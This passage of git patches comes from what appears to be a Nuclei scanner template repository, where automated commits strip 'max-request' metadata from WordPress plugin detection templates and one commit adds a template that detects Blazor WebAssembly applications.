+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index 1c25b6f488..aaad04cb76 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
-    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index b36317acd8..ff750a7d2a 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
-    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index 5eb35dd17e..f1e7595ccd 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
-    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index ceb2b8d600..4b2769ee46 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
-    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 580de94348a14c365878c94b5f89f5f80adf3b80 Mon Sep 17 00:00:00 2001
From: Dominique RIGHETTO 
Date: Sun, 24 Sep 2023 09:17:15 +0200
Subject: [PATCH 0504/1090] Add tpl

---
 .../blazor-webassembly-detect.yaml            | 43 +++++++++++++++++++
 1 file changed, 43 insertions(+)
 create mode 100644 http/technologies/blazor-webassembly-detect.yaml

diff --git a/http/technologies/blazor-webassembly-detect.yaml b/http/technologies/blazor-webassembly-detect.yaml
new file mode 100644
index 0000000000..e7e0be0810
--- /dev/null
+++ b/http/technologies/blazor-webassembly-detect.yaml
@@ -0,0 +1,43 @@
+id: blazor-webassembly-detect
+
+info:
+  name: Blazor WebAssembly - Detect
+  author: righettod
+  severity: info
+  description: |
+    Blazor WebAssembly application was detected.
+  reference:
+    - https://dotnet.microsoft.com/en-us/apps/aspnet/web-apps/blazor
+    - https://github.com/righettod/burp-piper-custom-scripts/issues/1
+  metadata:
+    max-request: 2
+    verified: true
+  tags: blazor,webassembly,detect
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/_framework/blazor.boot.json'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'dotnet.wasm'
+          - '"entryAssembly"'
+          - '"Microsoft.JSInterop.WebAssembly.dll"'
+        condition: and
+        case-insensitive: true
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'dotnet.([0-9.]+).[a-z0-9]+.js'

From ceb38c80b011136c9fc51b84ea2f6db1e94060be Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sun, 1 Oct 2023 04:12:23 +0000
Subject: [PATCH 0505/1090] Auto WordPress Plugins Update [Sun Oct  1 04:12:23
 UTC 2023] :robot:

---
 helpers/wordpress/plugins/child-theme-configurator.txt          | 2 +-
 http/technologies/wordpress/plugins/ad-inserter.yaml            | 1 -
 http/technologies/wordpress/plugins/add-to-any.yaml             | 1 -
 http/technologies/wordpress/plugins/admin-menu-editor.yaml      | 1 -
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 -
 http/technologies/wordpress/plugins/akismet.yaml                | 1 -
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml         | 1 -
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml    | 1 -
 .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 -
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml  | 1 -
 http/technologies/wordpress/plugins/amp.yaml                    | 1 -
 http/technologies/wordpress/plugins/antispam-bee.yaml           | 1 -
 http/technologies/wordpress/plugins/astra-sites.yaml            | 1 -
 http/technologies/wordpress/plugins/astra-widgets.yaml          | 1 -
 http/technologies/wordpress/plugins/autoptimize.yaml            | 1 -
 http/technologies/wordpress/plugins/backwpup.yaml               | 1 -
 http/technologies/wordpress/plugins/better-search-replace.yaml  | 1 -
 http/technologies/wordpress/plugins/better-wp-security.yaml     | 1 -
 .../wordpress/plugins/black-studio-tinymce-widget.yaml          | 1 -
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml       | 1 -
 http/technologies/wordpress/plugins/breeze.yaml                 | 1 -
 http/technologies/wordpress/plugins/broken-link-checker.yaml    | 1 -
 .../wordpress/plugins/child-theme-configurator.yaml             | 1 -
 http/technologies/wordpress/plugins/classic-editor.yaml         | 1 -
 http/technologies/wordpress/plugins/classic-widgets.yaml        | 1 -
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml           | 1 -
 http/technologies/wordpress/plugins/cmb2.yaml                   | 1 -
 http/technologies/wordpress/plugins/coblocks.yaml               | 1 -
 http/technologies/wordpress/plugins/code-snippets.yaml          | 1 -
 http/technologies/wordpress/plugins/coming-soon.yaml            | 1 -
 http/technologies/wordpress/plugins/complianz-gdpr.yaml         | 1 -
 .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 -
 http/technologies/wordpress/plugins/contact-form-7.yaml         | 1 -
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml     | 1 -
 http/technologies/wordpress/plugins/cookie-law-info.yaml        | 1 -
 http/technologies/wordpress/plugins/cookie-notice.yaml          | 1 -
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml     | 1 -
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml    | 1 -
 http/technologies/wordpress/plugins/custom-css-js.yaml          | 1 -
 http/technologies/wordpress/plugins/custom-fonts.yaml           | 1 -
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml    | 1 -
 http/technologies/wordpress/plugins/disable-comments.yaml       | 1 -
 http/technologies/wordpress/plugins/disable-gutenberg.yaml      | 1 -
 http/technologies/wordpress/plugins/duplicate-page.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicate-post.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicator.yaml             | 1 -
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml      | 1 -
 http/technologies/wordpress/plugins/easy-fancybox.yaml          | 1 -
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 -
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/elementor.yaml              | 1 -
 http/technologies/wordpress/plugins/elementskit-lite.yaml       | 1 -
 http/technologies/wordpress/plugins/enable-media-replace.yaml   | 1 -
 http/technologies/wordpress/plugins/envato-elements.yaml        | 1 -
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml  | 1 -
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml   | 1 -
 .../wordpress/plugins/facebook-for-woocommerce.yaml             | 1 -
 http/technologies/wordpress/plugins/fast-indexing-api.yaml      | 1 -
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml      | 1 -
 http/technologies/wordpress/plugins/flamingo.yaml               | 1 -
 http/technologies/wordpress/plugins/fluentform.yaml             | 1 -
 http/technologies/wordpress/plugins/font-awesome.yaml           | 1 -
 .../wordpress/plugins/force-regenerate-thumbnails.yaml          | 1 -
 http/technologies/wordpress/plugins/formidable.yaml             | 1 -
 http/technologies/wordpress/plugins/forminator.yaml             | 1 -
 http/technologies/wordpress/plugins/ga-google-analytics.yaml    | 1 -
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 -
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml    | 1 -
 .../wordpress/plugins/google-analytics-for-wordpress.yaml       | 1 -
 .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 -
 http/technologies/wordpress/plugins/google-site-kit.yaml        | 1 -
 .../wordpress/plugins/google-sitemap-generator.yaml             | 1 -
 http/technologies/wordpress/plugins/gtranslate.yaml             | 1 -
 http/technologies/wordpress/plugins/gutenberg.yaml              | 1 -
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 -
 .../wordpress/plugins/header-footer-code-manager.yaml           | 1 -
 .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 -
 http/technologies/wordpress/plugins/header-footer.yaml          | 1 -
 http/technologies/wordpress/plugins/health-check.yaml           | 1 -
 http/technologies/wordpress/plugins/hello-dolly.yaml            | 1 -
 http/technologies/wordpress/plugins/host-webfonts-local.yaml    | 1 -
 http/technologies/wordpress/plugins/imagify.yaml                | 1 -
 http/technologies/wordpress/plugins/imsanity.yaml               | 1 -
 .../wordpress/plugins/insert-headers-and-footers.yaml           | 1 -
 http/technologies/wordpress/plugins/instagram-feed.yaml         | 1 -
 .../wordpress/plugins/intuitive-custom-post-order.yaml          | 1 -
 http/technologies/wordpress/plugins/iwp-client.yaml             | 1 -
 http/technologies/wordpress/plugins/jetpack-boost.yaml          | 1 -
 http/technologies/wordpress/plugins/jetpack.yaml                | 1 -
 http/technologies/wordpress/plugins/kadence-blocks.yaml         | 1 -
 http/technologies/wordpress/plugins/kirki.yaml                  | 1 -
 http/technologies/wordpress/plugins/leadin.yaml                 | 1 -
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml        | 1 -
 http/technologies/wordpress/plugins/limit-login-attempts.yaml   | 1 -
 http/technologies/wordpress/plugins/litespeed-cache.yaml        | 1 -
 http/technologies/wordpress/plugins/loco-translate.yaml         | 1 -
 http/technologies/wordpress/plugins/loginizer.yaml              | 1 -
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml       | 1 -
 http/technologies/wordpress/plugins/mailpoet.yaml               | 1 -
 http/technologies/wordpress/plugins/maintenance.yaml            | 1 -
 http/technologies/wordpress/plugins/mainwp-child.yaml           | 1 -
 http/technologies/wordpress/plugins/malcare-security.yaml       | 1 -
 http/technologies/wordpress/plugins/megamenu.yaml               | 1 -
 http/technologies/wordpress/plugins/members.yaml                | 1 -
 http/technologies/wordpress/plugins/meta-box.yaml               | 1 -
 http/technologies/wordpress/plugins/ml-slider.yaml              | 1 -
 http/technologies/wordpress/plugins/newsletter.yaml             | 1 -
 .../wordpress/plugins/nextend-facebook-connect.yaml             | 1 -
 http/technologies/wordpress/plugins/nextgen-gallery.yaml        | 1 -
 http/technologies/wordpress/plugins/ninja-forms.yaml            | 1 -
 http/technologies/wordpress/plugins/ocean-extra.yaml            | 1 -
 .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 -
 http/technologies/wordpress/plugins/one-click-demo-import.yaml  | 1 -
 http/technologies/wordpress/plugins/optinmonster.yaml           | 1 -
 http/technologies/wordpress/plugins/otter-blocks.yaml           | 1 -
 http/technologies/wordpress/plugins/password-protected.yaml     | 1 -
 http/technologies/wordpress/plugins/pdf-embedder.yaml           | 1 -
 .../wordpress/plugins/pinterest-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/pixelyoursite.yaml          | 1 -
 http/technologies/wordpress/plugins/polylang.yaml               | 1 -
 http/technologies/wordpress/plugins/popup-builder.yaml          | 1 -
 http/technologies/wordpress/plugins/popup-maker.yaml            | 1 -
 http/technologies/wordpress/plugins/post-smtp.yaml              | 1 -
 http/technologies/wordpress/plugins/post-types-order.yaml       | 1 -
 .../wordpress/plugins/premium-addons-for-elementor.yaml         | 1 -
 http/technologies/wordpress/plugins/pretty-link.yaml            | 1 -
 http/technologies/wordpress/plugins/really-simple-captcha.yaml  | 1 -
 http/technologies/wordpress/plugins/really-simple-ssl.yaml      | 1 -
 http/technologies/wordpress/plugins/redirection.yaml            | 1 -
 http/technologies/wordpress/plugins/redux-framework.yaml        | 1 -
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml  | 1 -
 http/technologies/wordpress/plugins/safe-svg.yaml               | 1 -
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml       | 1 -
 http/technologies/wordpress/plugins/sg-cachepress.yaml          | 1 -
 http/technologies/wordpress/plugins/sg-security.yaml            | 1 -
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml    | 1 -
 .../wordpress/plugins/shortpixel-image-optimiser.yaml           | 1 -
 .../wordpress/plugins/simple-custom-post-order.yaml             | 1 -
 http/technologies/wordpress/plugins/siteguard.yaml              | 1 -
 http/technologies/wordpress/plugins/siteorigin-panels.yaml      | 1 -
 http/technologies/wordpress/plugins/smart-slider-3.yaml         | 1 -
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml      | 1 -
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml  | 1 -
 http/technologies/wordpress/plugins/sucuri-scanner.yaml         | 1 -
 http/technologies/wordpress/plugins/svg-support.yaml            | 1 -
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 -
 http/technologies/wordpress/plugins/tablepress.yaml             | 1 -
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml   | 1 -
 http/technologies/wordpress/plugins/the-events-calendar.yaml    | 1 -
 http/technologies/wordpress/plugins/themeisle-companion.yaml    | 1 -
 http/technologies/wordpress/plugins/tinymce-advanced.yaml       | 1 -
 .../wordpress/plugins/translatepress-multilingual.yaml          | 1 -
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml        | 1 -
 .../technologies/wordpress/plugins/under-construction-page.yaml | 1 -
 http/technologies/wordpress/plugins/updraftplus.yaml            | 1 -
 http/technologies/wordpress/plugins/use-any-font.yaml           | 1 -
 http/technologies/wordpress/plugins/user-role-editor.yaml       | 1 -
 .../wordpress/plugins/velvet-blues-update-urls.yaml             | 1 -
 http/technologies/wordpress/plugins/w3-total-cache.yaml         | 1 -
 .../wordpress/plugins/webp-converter-for-media.yaml             | 1 -
 http/technologies/wordpress/plugins/webp-express.yaml           | 1 -
 .../wordpress/plugins/widget-importer-exporter.yaml             | 1 -
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml        | 1 -
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml        | 1 -
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 -
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml    | 1 -
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml           | 1 -
 http/technologies/wordpress/plugins/woocommerce-payments.yaml   | 1 -
 .../wordpress/plugins/woocommerce-paypal-payments.yaml          | 1 -
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml         | 1 -
 http/technologies/wordpress/plugins/woocommerce-services.yaml   | 1 -
 http/technologies/wordpress/plugins/woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/wordfence.yaml              | 1 -
 http/technologies/wordpress/plugins/wordpress-importer.yaml     | 1 -
 http/technologies/wordpress/plugins/wordpress-seo.yaml          | 1 -
 http/technologies/wordpress/plugins/worker.yaml                 | 1 -
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml       | 1 -
 http/technologies/wordpress/plugins/wp-file-manager.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-google-maps.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml    | 1 -
 http/technologies/wordpress/plugins/wp-migrate-db.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml     | 1 -
 http/technologies/wordpress/plugins/wp-optimize.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-pagenavi.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-reset.yaml               | 1 -
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-rollback.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-seopress.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-smushit.yaml             | 1 -
 http/technologies/wordpress/plugins/wp-statistics.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-super-cache.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-user-avatar.yaml         | 1 -
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml        | 1 -
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml         | 1 -
 http/technologies/wordpress/plugins/wpforms-lite.yaml           | 1 -
 http/technologies/wordpress/plugins/wps-hide-login.yaml         | 1 -
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml  | 1 -
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml            | 1 -
 201 files changed, 1 insertion(+), 201 deletions(-)

diff --git a/helpers/wordpress/plugins/child-theme-configurator.txt b/helpers/wordpress/plugins/child-theme-configurator.txt
index d5724cd41b..bd4053bfb1 100644
--- a/helpers/wordpress/plugins/child-theme-configurator.txt
+++ b/helpers/wordpress/plugins/child-theme-configurator.txt
@@ -1 +1 @@
-2.6.2
\ No newline at end of file
+2.6.3
\ No newline at end of file
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index ebb5ba1042..7cbd1855ae 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
-    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index fddfbf3118..8d579ff23d 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
-    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 7a6e8a76ec..4a6d8b7bbe 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
-    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index 940c0e614c..e4eb308d39 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
-    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index ac77f4e5f5..f68ad2a6bf 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
-    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 90aa5881fd..10f104f2c7 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
-    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 1bf337da6c..8addc28ded 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 7cec152555..2e579621ac 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 8a4b6133cd..41e297ffeb 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index cfa2e3d080..0dd8686ec3 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
-    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index a92d9bde4e..359671f3bd 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
-    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 59144c7dd5..116e0c420a 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
-    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index df06ba2f35..dc4703ef8d 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 2a79d529cc..1426ac3ef2 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
-    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 556a113acc..78d1651ff4 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
-    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index 58d9a9d738..f7219b373d 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
-    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index 6c9c485079..f688a68f72 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
-    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 7631e87d78..00e95c4263 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
-    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index c7daa26ac6..212b2b13c4 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
-    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 68767e4dce..6318392c5c 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
-    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index 073618936d..e1a2a186e0 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
